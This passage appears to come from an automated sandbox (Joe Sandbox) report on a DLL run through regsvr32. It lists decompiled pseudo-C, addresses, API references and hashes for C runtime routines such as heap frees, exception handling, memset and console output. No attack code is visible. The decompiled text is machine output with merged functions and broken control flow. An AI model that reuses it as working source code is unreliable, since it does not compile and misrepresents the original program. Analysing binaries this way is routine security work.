				E6E4610BE( *((intOrPtr*)(_a4 + 0x30)));
				E6E4610BE( *((intOrPtr*)(_a4 + 0x34)));
				E6E4610BE( *((intOrPtr*)(_a4 + 0x38)));
				E6E4610BE( *((intOrPtr*)(_a4 + 0x28)));
				E6E4610BE( *((intOrPtr*)(_a4 + 0x2c)));
				E6E4610BE( *((intOrPtr*)(_a4 + 0x40)));
				E6E4610BE( *((intOrPtr*)(_a4 + 0x44)));
				E6E4610BE( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E6E460B54(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E6E460BBF(_t67, _t72, _t73, _t77);
			}

0x6e460d28
0x6e460d28
0x6e460d28
0x6e460d2d
0x6e460d33
0x6e460d35
0x6e460d3b
0x6e460d3e
0x6e460d43
0x6e460d46
0x6e460d4a
0x6e460d55
0x6e460d60
0x6e460d6b
0x6e460d76
0x6e460d81
0x6e460d8c
0x6e460d97
0x6e460da5
0x6e460db0
0x6e460db8
0x6e460db9
0x6e460dbc
0x6e460dc2
0x6e460dc6
0x6e460dca
0x6e460dcb
0x6e460dd5
0x6e460ddb
0x6e460ddc
0x6e460ddf
0x6e460de5
0x6e460de9
0x6e460ded
0x6e460df4

APIs

_free.LIBCMT ref: 6E460D3E

Part of subcall function 6E4610BE: HeapFree.KERNEL32(00000000,00000000), ref: 6E4610D4
Part of subcall function 6E4610BE: GetLastError.KERNEL32(00000004,?,6E4679F5,00000004,00000000,00000004,?,?,6E467A1C,00000004,00000007,00000004,?,6E464A49,00000004,00000004), ref: 6E4610E6

_free.LIBCMT ref: 6E460D4A
_free.LIBCMT ref: 6E460D55
_free.LIBCMT ref: 6E460D60
_free.LIBCMT ref: 6E460D6B
_free.LIBCMT ref: 6E460D76
_free.LIBCMT ref: 6E460D81
_free.LIBCMT ref: 6E460D8C
_free.LIBCMT ref: 6E460D97
_free.LIBCMT ref: 6E460DA5

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8128983c09d6d02d1a41a3eb1d5435abb14094de97d45d1e6ae03c722c83bb7e
Instruction ID: 9576862c5b203c2852a9cba7c3e39c4f0d24cbb21aab46661e47a918e4179bd5
Opcode Fuzzy Hash: 8128983c09d6d02d1a41a3eb1d5435abb14094de97d45d1e6ae03c722c83bb7e
Instruction Fuzzy Hash: B5219A76A00148AFCF51DFE5C840DDD7BB9BF08244F0145AAE5199B621EB72EA58CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 6E45B720 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E6E45B720(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				signed char _v36;
				void* _v40;
				signed int _t77;
				signed int _t84;
				intOrPtr _t85;
				void* _t86;
				intOrPtr* _t87;
				intOrPtr _t89;
				signed int _t91;
				int _t93;
				signed int _t98;
				intOrPtr* _t102;
				intOrPtr _t103;
				signed int _t107;
				char _t109;
				signed int _t113;
				void* _t114;
				intOrPtr _t123;
				void* _t125;
				intOrPtr _t133;
				signed int _t135;
				void* _t139;
				void* _t141;
				void* _t149;

				_t118 = __edx;
				_t102 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t102 = E6E46AE10(__ecx,  *_t102);
				_t103 = _a8;
				_t6 = _t103 + 0x10; // 0x11
				_t133 = _t6;
				_push(_t133);
				_v20 = _t133;
				_v12 =  *(_t103 + 8) ^  *0x6e474024;
				E6E45B6E0(_t103, __edx, __edi, _t133,  *(_t103 + 8) ^  *0x6e474024);
				E6E45CEEC(_a12);
				_t77 = _a4;
				_t141 = _t139 - 0x1c + 0x10;
				_t123 =  *((intOrPtr*)(_t103 + 0xc));
				if(( *(_t77 + 4) & 0x00000066) != 0) {
					__eflags = _t123 - 0xfffffffe;
					if(_t123 != 0xfffffffe) {
						_t118 = 0xfffffffe;
						E6E45D0E0(_t103, 0xfffffffe, _t133, 0x6e474024);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t77;
					_v28 = _a12;
					 *((intOrPtr*)(_t103 - 4)) =  &_v32;
					if(_t123 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t107 = _v12;
							_t84 = _t123 + (_t123 + 2) * 2;
							_t103 =  *((intOrPtr*)(_t107 + _t84 * 4));
							_t85 = _t107 + _t84 * 4;
							_t108 =  *((intOrPtr*)(_t85 + 4));
							_v24 = _t85;
							if( *((intOrPtr*)(_t85 + 4)) == 0) {
								_t109 = _v5;
								goto L7;
							} else {
								_t118 = _t133;
								_t86 = E6E45D080(_t108, _t133);
								_t109 = 1;
								_v5 = 1;
								_t149 = _t86;
								if(_t149 < 0) {
									_v16 = 0;
									L13:
									_push(_t133);
									E6E45B6E0(_t103, _t118, _t123, _t133, _v12);
									goto L14;
								} else {
									if(_t149 > 0) {
										_t87 = _a4;
										__eflags =  *_t87 - 0xe06d7363;
										if( *_t87 == 0xe06d7363) {
											__eflags =  *0x6e46c31c;
											if(__eflags != 0) {
												_t98 = E6E46A890(__eflags, 0x6e46c31c);
												_t141 = _t141 + 4;
												__eflags = _t98;
												if(_t98 != 0) {
													_t135 =  *0x6e46c31c; // 0x6e45b129
													 *0x6e46c164(_a4, 1);
													 *_t135();
													_t133 = _v20;
													_t141 = _t141 + 8;
												}
												_t87 = _a4;
											}
										}
										_t119 = _t87;
										E6E45D0C0(_t87, _a8, _t87);
										_t89 = _a8;
										__eflags =  *((intOrPtr*)(_t89 + 0xc)) - _t123;
										if( *((intOrPtr*)(_t89 + 0xc)) != _t123) {
											_t119 = _t123;
											E6E45D0E0(_t89, _t123, _t133, 0x6e474024);
											_t89 = _a8;
										}
										_push(_t133);
										 *((intOrPtr*)(_t89 + 0xc)) = _t103;
										E6E45B6E0(_t103, _t119, _t123, _t133, _v12);
										E6E45D0A0();
										asm("int3");
										asm("int3");
										asm("int3");
										_t113 = _v32;
										_t91 = _v36 & 0x000000ff;
										_t125 = _v40;
										__eflags = _t113;
										if(_t113 == 0) {
											L46:
											return _v40;
										} else {
											_t93 = _t91 * 0x1010101;
											__eflags = _t113 - 0x20;
											if(_t113 <= 0x20) {
												L39:
												__eflags = _t113 & 0x00000003;
												while((_t113 & 0x00000003) != 0) {
													 *_t125 = _t93;
													_t125 = _t125 + 1;
													_t113 = _t113 - 1;
													__eflags = _t113 & 0x00000003;
												}
												__eflags = _t113 & 0x00000004;
												if((_t113 & 0x00000004) != 0) {
													 *_t125 = _t93;
													_t125 = _t125 + 4;
													_t113 = _t113 - 4;
													__eflags = _t113;
												}
												__eflags = _t113 & 0xfffffff8;
												while((_t113 & 0xfffffff8) != 0) {
													 *_t125 = _t93;
													 *(_t125 + 4) = _t93;
													_t125 = _t125 + 8;
													_t113 = _t113 - 8;
													__eflags = _t113 & 0xfffffff8;
												}
												goto L46;
											} else {
												__eflags = _t113 - 0x80;
												if(__eflags < 0) {
													L33:
													asm("bt dword [0x6e474014], 0x1");
													if(__eflags >= 0) {
														goto L39;
													} else {
														asm("movd xmm0, eax");
														asm("pshufd xmm0, xmm0, 0x0");
														goto L35;
													}
												} else {
													asm("bt dword [0x6e474fe4], 0x1");
													if(__eflags >= 0) {
														asm("bt dword [0x6e474014], 0x1");
														if(__eflags >= 0) {
															goto L39;
														} else {
															asm("movd xmm0, eax");
															asm("pshufd xmm0, xmm0, 0x0");
															_t114 = _t125 + _t113;
															asm("movups [edi], xmm0");
															_t125 = _t125 + 0x00000010 & 0xfffffff0;
															_t113 = _t114 - _t125;
															__eflags = _t113 - 0x80;
															if(__eflags <= 0) {
																goto L33;
															} else {
																do {
																	asm("movdqa [edi], xmm0");
																	asm("movdqa [edi+0x10], xmm0");
																	asm("movdqa [edi+0x20], xmm0");
																	asm("movdqa [edi+0x30], xmm0");
																	asm("movdqa [edi+0x40], xmm0");
																	asm("movdqa [edi+0x50], xmm0");
																	asm("movdqa [edi+0x60], xmm0");
																	asm("movdqa [edi+0x70], xmm0");
																	_t125 = _t125 + 0x80;
																	_t113 = _t113 - 0x80;
																	__eflags = _t113 & 0xffffff00;
																} while ((_t113 & 0xffffff00) != 0);
																L35:
																__eflags = _t113 - 0x20;
																if(_t113 < 0x20) {
																	L38:
																	asm("movdqu [edi], xmm0");
																	asm("movdqu [edi+0x10], xmm0");
																	return _v40;
																} else {
																	do {
																		asm("movdqu [edi], xmm0");
																		asm("movdqu [edi+0x10], xmm0");
																		_t125 = _t125 + 0x20;
																		_t113 = _t113 - 0x20;
																		__eflags = _t113 - 0x20;
																	} while (_t113 >= 0x20);
																	__eflags = _t113 & 0x0000001f;
																	if((_t113 & 0x0000001f) == 0) {
																		goto L46;
																	} else {
																		goto L38;
																	}
																}
															}
														}
													} else {
														memset(_t125, _t93, _t113 << 0);
														return _v40;
													}
												}
											}
										}
									} else {
										goto L7;
									}
								}
							}
							goto L47;
							L7:
							_t123 = _t103;
						} while (_t103 != 0xfffffffe);
						if(_t109 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L47:
			}

0x6e45b720
0x6e45b727
0x6e45b72b
0x6e45b72c
0x6e45b732
0x6e45b73e
0x6e45b740
0x6e45b746
0x6e45b746
0x6e45b74f
0x6e45b751
0x6e45b754
0x6e45b757
0x6e45b75f
0x6e45b764
0x6e45b767
0x6e45b76a
0x6e45b771
0x6e45b7cd
0x6e45b7d0
0x6e45b7d8
0x6e45b7df
0x00000000
0x6e45b7df
0x00000000
0x6e45b773
0x6e45b773
0x6e45b779
0x6e45b77f
0x6e45b785
0x6e45b7f0
0x6e45b7f9
0x6e45b787
0x6e45b787
0x6e45b787
0x6e45b78d
0x6e45b790
0x6e45b793
0x6e45b796
0x6e45b799
0x6e45b79e
0x6e45b7b4
0x00000000
0x6e45b7a0
0x6e45b7a0
0x6e45b7a2
0x6e45b7a7
0x6e45b7a9
0x6e45b7ac
0x6e45b7ae
0x6e45b7c4
0x6e45b7e4
0x6e45b7e4
0x6e45b7e8
0x00000000
0x6e45b7b0
0x6e45b7b0
0x6e45b7fa
0x6e45b7fd
0x6e45b803
0x6e45b805
0x6e45b80c
0x6e45b813
0x6e45b818
0x6e45b81b
0x6e45b81d
0x6e45b81f
0x6e45b82c
0x6e45b832
0x6e45b834
0x6e45b837
0x6e45b837
0x6e45b83a
0x6e45b83a
0x6e45b80c
0x6e45b840
0x6e45b842
0x6e45b847
0x6e45b84a
0x6e45b84d
0x6e45b855
0x6e45b859
0x6e45b85e
0x6e45b85e
0x6e45b861
0x6e45b865
0x6e45b868
0x6e45b878
0x6e45b87d
0x6e45b87e
0x6e45b87f
0x6e45b880
0x6e45b884
0x6e45b88b
0x6e45b88f
0x6e45b891
0x6e45b9d3
0x6e45b9d9
0x6e45b897
0x6e45b897
0x6e45b89d
0x6e45b8a0
0x6e45b985
0x6e45b985
0x6e45b98b
0x6e45b98d
0x6e45b98f
0x6e45b990
0x6e45b993
0x6e45b993
0x6e45b99b
0x6e45b9a1
0x6e45b9a3
0x6e45b9a5
0x6e45b9a8
0x6e45b9a8
0x6e45b9a8
0x6e45b9ab
0x6e45b9b1
0x6e45b9c0
0x6e45b9c2
0x6e45b9c5
0x6e45b9c8
0x6e45b9cb
0x6e45b9cb
0x00000000
0x6e45b8a6
0x6e45b8a6
0x6e45b8ac
0x6e45b93d
0x6e45b93d
0x6e45b945
0x00000000
0x6e45b947
0x6e45b947
0x6e45b94b
0x00000000
0x6e45b94b
0x6e45b8b2
0x6e45b8b2
0x6e45b8ba
0x6e45b8c5
0x6e45b8cd
0x00000000
0x6e45b8d3
0x6e45b8d3
0x6e45b8d7
0x6e45b8dc
0x6e45b8de
0x6e45b8e4
0x6e45b8e7
0x6e45b8e9
0x6e45b8ef
0x00000000
0x6e45b900
0x6e45b900
0x6e45b900
0x6e45b904
0x6e45b909
0x6e45b90e
0x6e45b913
0x6e45b918
0x6e45b91d
0x6e45b922
0x6e45b927
0x6e45b92d
0x6e45b933
0x6e45b933
0x6e45b950
0x6e45b950
0x6e45b953
0x6e45b971
0x6e45b975
0x6e45b979
0x6e45b984
0x6e45b955
0x6e45b955
0x6e45b955
0x6e45b959
0x6e45b95e
0x6e45b961
0x6e45b964
0x6e45b964
0x6e45b969
0x6e45b96f
0x00000000
0x00000000
0x00000000
0x00000000
0x6e45b96f
0x6e45b953
0x6e45b8ef
0x6e45b8bc
0x6e45b8bc
0x6e45b8c4
0x6e45b8c4
0x6e45b8ba
0x6e45b8ac
0x6e45b8a0
0x6e45b7b2
0x00000000
0x6e45b7b2
0x6e45b7b0
0x6e45b7ae
0x00000000
0x6e45b7b7
0x6e45b7b7
0x6e45b7b9
0x6e45b7c0
0x00000000
0x6e45b7c2
0x00000000
0x6e45b7c0
0x6e45b785
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 6E45B757
___except_validate_context_record.LIBVCRUNTIME ref: 6E45B75F
_ValidateLocalCookies.LIBCMT ref: 6E45B7E8
__IsNonwritableInCurrentImage.LIBCMT ref: 6E45B813
_ValidateLocalCookies.LIBCMT ref: 6E45B868

Strings

csm, xrefs: 6E45B7FD

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: d588ff4d53a45f6bb08d472d43499dabafbc34ae7c67a5b5e71316ca7c8f0b93
Instruction ID: db308e3e47112f32bc3d05d89c7afe8be8ced8f5d9e7676c3d4897d3bbdaee15
Opcode Fuzzy Hash: d588ff4d53a45f6bb08d472d43499dabafbc34ae7c67a5b5e71316ca7c8f0b93
Instruction Fuzzy Hash: FD417F34A002199BCF00DFB9C890E9EBBB5EF45358F10846BE9149B395D731AA66CFD1

Uniqueness

Uniqueness Score: -1.00%

Function 6E4633E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E4633E0(intOrPtr* _a4, intOrPtr _a8, char _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t7 =  &_a16; // 0x6e46356e
						_t14 = E6E463E6E( *_t7, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E6E463E6E(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E6E46027C(GetLastError());
									_t17 =  *((intOrPtr*)(E6E4602B2(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E6E4634A7(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E6E46027C(GetLastError());
						_t17 =  *((intOrPtr*)(E6E4602B2(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E6E4634A7(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E6E4634CE(_a8);
				return 0;
			}

0x6e4633e6
0x6e4633eb
0x6e4633ff
0x6e463402
0x6e463431
0x6e463434
0x6e46343c
0x6e46343e
0x6e463457
0x6e46345a
0x6e46345d
0x6e46346b
0x6e46347a
0x6e463482
0x6e463484
0x6e46349d
0x6e4634a0
0x6e4634a0
0x6e463486
0x6e46348d
0x6e463498
0x6e463498
0x6e4634a2
0x6e4634a3
0x00000000
0x6e4634a3
0x6e463462
0x6e463467
0x6e463469
0x00000000
0x00000000
0x00000000
0x6e463469
0x6e463447
0x6e463452
0x00000000
0x6e463452
0x6e463404
0x6e463407
0x6e46340a
0x6e46341d
0x6e463420
0x6e463422
0x6e463424
0x00000000
0x6e463424
0x6e463410
0x6e463415
0x6e463417
0x00000000
0x00000000
0x00000000
0x6e463417
0x6e4633f0
0x00000000

Strings

C:\Windows\SysWOW64\regsvr32.exe, xrefs: 6E4633E5
n5Fn, xrefs: 6E463431

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID:
String ID: C:\Windows\SysWOW64\regsvr32.exe$n5Fn
API String ID: 0-2133535636
Opcode ID: 51a3135ad62da6cd3a095e1a02249bee4b30af899dca0f8e074fa5b150de0eec
Instruction ID: b38eebbdb60a2d424cd008325d33d2c5c94b8d12b22d98781e160caf27ae521f
Opcode Fuzzy Hash: 51a3135ad62da6cd3a095e1a02249bee4b30af899dca0f8e074fa5b150de0eec
Instruction Fuzzy Hash: ED216F71608645AF9B529FFBDC88E9BB7ACEF81378710891AF91596254EB30DC4087E0

Uniqueness

Uniqueness Score: -1.00%

Function 6E467A03 Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6E467A03(intOrPtr _a4) {
				void* _t18;
				intOrPtr _t45;

				_t45 = _a4;
				if(_t45 != 0) {
					E6E4679CB(_t45, 7);
					_t2 = _t45 + 0x1c; // 0x20
					E6E4679CB(_t2, 7);
					_t3 = _t45 + 0x38; // 0x3c
					E6E4679CB(_t3, 0xc);
					_t4 = _t45 + 0x68; // 0x6c
					E6E4679CB(_t4, 0xc);
					_t5 = _t45 + 0x98; // 0x9c
					E6E4679CB(_t5, 2);
					E6E4610BE( *((intOrPtr*)(_t45 + 0xa0)));
					E6E4610BE( *((intOrPtr*)(_t45 + 0xa4)));
					E6E4610BE( *((intOrPtr*)(_t45 + 0xa8)));
					_t9 = _t45 + 0xb4; // 0xb8
					E6E4679CB(_t9, 7);
					_t10 = _t45 + 0xd0; // 0xd4
					E6E4679CB(_t10, 7);
					_t11 = _t45 + 0xec; // 0xf0
					E6E4679CB(_t11, 0xc);
					_t12 = _t45 + 0x11c; // 0x120
					E6E4679CB(_t12, 0xc);
					_t13 = _t45 + 0x14c; // 0x150
					E6E4679CB(_t13, 2);
					E6E4610BE( *((intOrPtr*)(_t45 + 0x154)));
					E6E4610BE( *((intOrPtr*)(_t45 + 0x158)));
					E6E4610BE( *((intOrPtr*)(_t45 + 0x15c)));
					return E6E4610BE( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x6e467a09
0x6e467a0e
0x6e467a17
0x6e467a1c
0x6e467a22
0x6e467a27
0x6e467a2d
0x6e467a32
0x6e467a38
0x6e467a3d
0x6e467a46
0x6e467a51
0x6e467a5c
0x6e467a67
0x6e467a6c
0x6e467a75
0x6e467a7a
0x6e467a83
0x6e467a8b
0x6e467a94
0x6e467a99
0x6e467aa2
0x6e467aa7
0x6e467ab0
0x6e467abb
0x6e467ac6
0x6e467ad1
0x00000000
0x6e467ae1
0x6e467ae6

APIs

Part of subcall function 6E4679CB: _free.LIBCMT ref: 6E4679F0

_free.LIBCMT ref: 6E467A51

Part of subcall function 6E4610BE: HeapFree.KERNEL32(00000000,00000000), ref: 6E4610D4
Part of subcall function 6E4610BE: GetLastError.KERNEL32(00000004,?,6E4679F5,00000004,00000000,00000004,?,?,6E467A1C,00000004,00000007,00000004,?,6E464A49,00000004,00000004), ref: 6E4610E6

_free.LIBCMT ref: 6E467A5C
_free.LIBCMT ref: 6E467A67
_free.LIBCMT ref: 6E467ABB
_free.LIBCMT ref: 6E467AC6
_free.LIBCMT ref: 6E467AD1
_free.LIBCMT ref: 6E467ADC

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a2bb66c6e2cfaa9a0a88a15b2dcd11407e903fe348f8a93c51e83bc192e8a5ef
Instruction ID: 65da3daa82a647068991ab7d647a9720ad4c0d6a61df89702f676beaa17907ff
Opcode Fuzzy Hash: a2bb66c6e2cfaa9a0a88a15b2dcd11407e903fe348f8a93c51e83bc192e8a5ef
Instruction Fuzzy Hash: 23111FB1644B48EBED30ABF2CC09FCB7BED5F04704F804D1EA69D665D0DB65B5084691

Uniqueness

Uniqueness Score: -1.00%

Function 6E464E6C Relevance: 9.3, APIs: 6, Instructions: 317
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 84%

			E6E464E6C(void* __eflags, intOrPtr _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				signed char _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v51;
				void _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed int _v84;
				signed int _v88;
				char _v92;
				intOrPtr _v96;
				long _v100;
				signed char* _v104;
				signed char* _v108;
				void* _v112;
				intOrPtr _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t170;
				signed int _t172;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				signed char* _t202;
				void* _t206;
				struct _OVERLAPPED* _t211;
				void* _t220;
				long _t224;
				intOrPtr _t225;
				char _t227;
				void* _t237;
				signed int _t242;
				intOrPtr _t245;
				signed int _t248;
				signed int _t249;
				signed int _t251;
				intOrPtr _t253;
				void* _t259;
				intOrPtr _t260;
				signed int _t261;
				signed char _t264;
				intOrPtr _t267;
				signed char* _t269;
				signed int _t272;
				signed int _t273;
				signed int _t277;
				signed int _t278;
				intOrPtr _t279;
				signed int _t280;
				struct _OVERLAPPED* _t282;
				struct _OVERLAPPED* _t284;
				signed int _t285;
				void* _t286;
				void* _t287;

				_t170 =  *0x6e474024; // 0xb68207cc
				_v8 = _t170 ^ _t285;
				_t172 = _a8;
				_t264 = _t172 >> 6;
				_t242 = (_t172 & 0x0000003f) * 0x38;
				_t269 = _a12;
				_v108 = _t269;
				_v80 = _t264;
				_v112 =  *((intOrPtr*)(_t242 +  *((intOrPtr*)(0x6e475620 + _t264 * 4)) + 0x18));
				_v44 = _t242;
				_v96 = _a16 + _t269;
				_t178 = GetConsoleOutputCP();
				_t241 = 0;
				_v124 = _t178;
				E6E45DD26( &_v72, _t264, 0);
				_t273 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_t245 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t245;
				_v104 = _t269;
				if(_t269 >= _v96) {
					L48:
					__eflags = _v60 - _t241;
				} else {
					while(1) {
						_t248 = _v44;
						_v51 =  *_t269;
						_v76 = _t241;
						_v40 = 1;
						_t186 =  *((intOrPtr*)(0x6e475620 + _v80 * 4));
						_v48 = _t186;
						if(_t245 != 0xfde9) {
							goto L19;
						}
						_t211 = _t241;
						_t267 = _v48 + 0x2e + _t248;
						_v116 = _t267;
						while( *((intOrPtr*)(_t267 + _t211)) != _t241) {
							_t211 =  &(_t211->Internal);
							if(_t211 < 5) {
								continue;
							}
							break;
						}
						_t264 = _v96 - _t269;
						_v40 = _t211;
						if(_t211 <= 0) {
							_t72 = ( *_t269 & 0x000000ff) + 0x6e474770; // 0x0
							_t253 =  *_t72 + 1;
							_v48 = _t253;
							__eflags = _t253 - _t264;
							if(_t253 > _t264) {
								__eflags = _t264;
								if(_t264 <= 0) {
									goto L40;
								} else {
									_t278 = _v44;
									do {
										 *((char*)( *((intOrPtr*)(0x6e475620 + _v80 * 4)) + _t278 + _t241 + 0x2e)) =  *((intOrPtr*)(_t241 + _t269));
										_t241 =  &(_t241->Internal);
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									goto L39;
								}
							} else {
								_v144 = _t241;
								__eflags = _t253 - 4;
								_v140 = _t241;
								_v56 = _t269;
								_v40 = (_t253 == 4) + 1;
								_t220 = E6E465BE8( &_v144,  &_v76,  &_v56, (_t253 == 4) + 1,  &_v144);
								_t287 = _t286 + 0x10;
								__eflags = _t220 - 0xffffffff;
								if(_t220 == 0xffffffff) {
									goto L48;
								} else {
									_t279 = _v48;
									goto L18;
								}
							}
						} else {
							_t224 =  *((char*)(( *(_t248 + _v48 + 0x2e) & 0x000000ff) + 0x6e474770)) + 1;
							_v56 = _t224;
							_t225 = _t224 - _v40;
							_v48 = _t225;
							if(_t225 > _t264) {
								__eflags = _t264;
								if(_t264 > 0) {
									_t280 = _t248;
									do {
										_t227 =  *((intOrPtr*)(_t241 + _t269));
										_t259 =  *((intOrPtr*)(0x6e475620 + _v80 * 4)) + _t280 + _t241;
										_t241 =  &(_t241->Internal);
										 *((char*)(_t259 + _v40 + 0x2e)) = _t227;
										_t280 = _v44;
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									L39:
									_t273 = _v88;
								}
								L40:
								_t277 = _t273 + _t264;
								__eflags = _t277;
								L41:
								__eflags = _v60;
								_v88 = _t277;
							} else {
								_t264 = _v40;
								_t282 = _t241;
								_t260 = _v116;
								do {
									 *((char*)(_t285 + _t282 - 0xc)) =  *((intOrPtr*)(_t260 + _t282));
									_t282 =  &(_t282->Internal);
								} while (_t282 < _t264);
								_t283 = _v48;
								_t261 = _v44;
								if(_v48 > 0) {
									E6E45BA40( &_v16 + _t264, _t269, _t283);
									_t261 = _v44;
									_t286 = _t286 + 0xc;
									_t264 = _v40;
								}
								_t272 = _v80;
								_t284 = _t241;
								do {
									 *( *((intOrPtr*)(0x6e475620 + _t272 * 4)) + _t261 + _t284 + 0x2e) = _t241;
									_t284 =  &(_t284->Internal);
								} while (_t284 < _t264);
								_t269 = _v104;
								_t279 = _v48;
								_v120 =  &_v16;
								_v136 = _t241;
								_v132 = _t241;
								_v40 = (_v56 == 4) + 1;
								_t237 = E6E465BE8( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
								_t287 = _t286 + 0x10;
								if(_t237 == 0xffffffff) {
									goto L48;
								} else {
									L18:
									_t269 = _t269 - 1 + _t279;
									L27:
									_t269 =  &(_t269[1]);
									_v104 = _t269;
									_t193 = E6E463E6E(_v124, _t241,  &_v76, _v40,  &_v32, 5, _t241, _t241);
									_t286 = _t287 + 0x20;
